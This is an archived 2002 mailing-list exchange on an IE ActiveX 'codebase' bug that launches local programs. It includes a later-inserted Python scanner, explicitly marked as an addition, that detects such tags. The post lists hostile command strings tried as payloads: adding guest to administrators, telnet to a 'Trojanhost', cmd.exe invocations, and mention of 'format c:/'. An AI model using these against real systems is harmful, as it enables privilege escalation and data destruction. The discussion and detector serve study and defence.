IExplorer

From: Steve (steveat_private)
Date: Wed Mar 06 2002 - 15:54:23 PST


    I know we have seen many websites already showing this as a problem.
    
    
       <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111"
               codebase="c:/winnt/system32/calc.exe"></object>
       <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111"
               codebase="c:/windows/system32/calc.exe"></object>
    
    Of course, this is part of the HTML that is causing this problem, but I was
    unable to reformat the string to cause any substantial privilege escalation
    in the system via this bug.
    
    It could well be because I do not know much about ActiveX, so please do
    advise. I am ignorant but wanting to learn!
    
    Here are some things I have tried with no results (tested on Windows XP):
    codebase="strings to try below"
    
    "C:/windows/system32/net.exe send localhost Testing"
    "C:/windows/system32/net.exe localgroup administrators guest /add"
    "C:/windows/system32/iisreset.exe"
    "C:/windows/system32/telnet Trojanhost"
    "C:/windows/system32/cmd.exe /k net send localhost Testing"
    etc...
    
    
    I am not game enough to run "format c:/" of course, but can anyone tell me why
    these strings fail miserably? Or maybe the bug isn't exactly that easily
    exploitable?

    Thomas Thornbury <thorntat_private> wrote:
    
    > This has got to be one of the scarier exploits in recent memory.
    
    Nah -- _far_ from it.
    
    Several people with a good record of finding truly bad holes in IE
    and related s/w have been banging away at this for some time now.
    First, to date no-one has found a way to use it for executing
    arbitrary code and there have been several other holes recently that
    do allow arbitrary code execution.  Second, no-one has even found a
    way to poke parameters to the programs that can be launched this
    way, which have to have a fully specified, local to the target
    program filename or pre-existing CLSID definition in the target
    machine's registry:
    
       http://home.austin.rr.com/wiredgoddess/thepull/funRun.html
    
    I'd rate it "mildly interesting"...
    
    This does not mean MS should delay fixing it until some clever soul
    does work out how to achieve either or both the above, but it
    certainly makes it orders of magnitude less interesting and less
    worrying than some of the recent "auto-detach and run" Email
    attachments or MIME "inclusions" in web pages bugs.
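    A gateway- or mail-filter-side check for the construct discussed in this
    thread, added here as an example and not part of the original post or the
    referenced page: it parses HTML and flags any <object> whose codebase names
    a file on the client machine (drive letter, UNC path or file: scheme) rather
    than a download URL, which is the shape every string above shares. The
    sample HTML is constructed; the tags from the post are included verbatim.

```python
import re
from html.parser import HTMLParser

# A codebase that points at the local filesystem instead of a download URL:
# a drive letter ("c:/..." or "C:\..."), a UNC path ("\\host\share") or a
# file: URL. Legitimate codebase values are http(s) URLs to a .cab/.ocx.
LOCAL_CODEBASE = re.compile(r"^\s*(?:[a-z]:[\\/]|\\\\|file:)", re.IGNORECASE)


class ObjectTagScanner(HTMLParser):
    """Collect every <object> tag whose codebase refers to a local file."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases tag and attribute names for us.
        if tag != "object":
            return
        attrs = {name: (value or "") for name, value in attrs}
        codebase = attrs.get("codebase", "")
        if LOCAL_CODEBASE.match(codebase):
            self.findings.append({
                "id": attrs.get("id", ""),
                "classid": attrs.get("classid", ""),
                "codebase": codebase.strip(),
            })


def scan_html(html):
    """Return a list of findings (one dict per suspicious <object> tag)."""
    scanner = ObjectTagScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: the two tags from the post, one backslash/uppercase
# variant, one file: URL, and one benign control with an HTTP codebase.
SAMPLE = """<html><body>
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111"
 codebase="c:/winnt/system32/calc.exe"></object>
<OBJECT ID="oFile2" CLASSID="clsid:11111111-1111-1111-1111-111111111111"
 CODEBASE="C:\\windows\\system32\\calc.exe"></OBJECT>
<object codebase="file:///c:/windows/system32/calc.exe"></object>
<object classid="clsid:00000000-0000-0000-0000-000000000000"
 codebase="http://example.invalid/control.cab#version=1,0,0,0"></object>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE):
        print("local codebase:", finding)
```

    Running it on the sample reports the three local-path objects and ignores
    the HTTP one.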
    
    This archive was generated by hypermail 2b30 : Wed Mar 06 2002 - 20:51:18 PST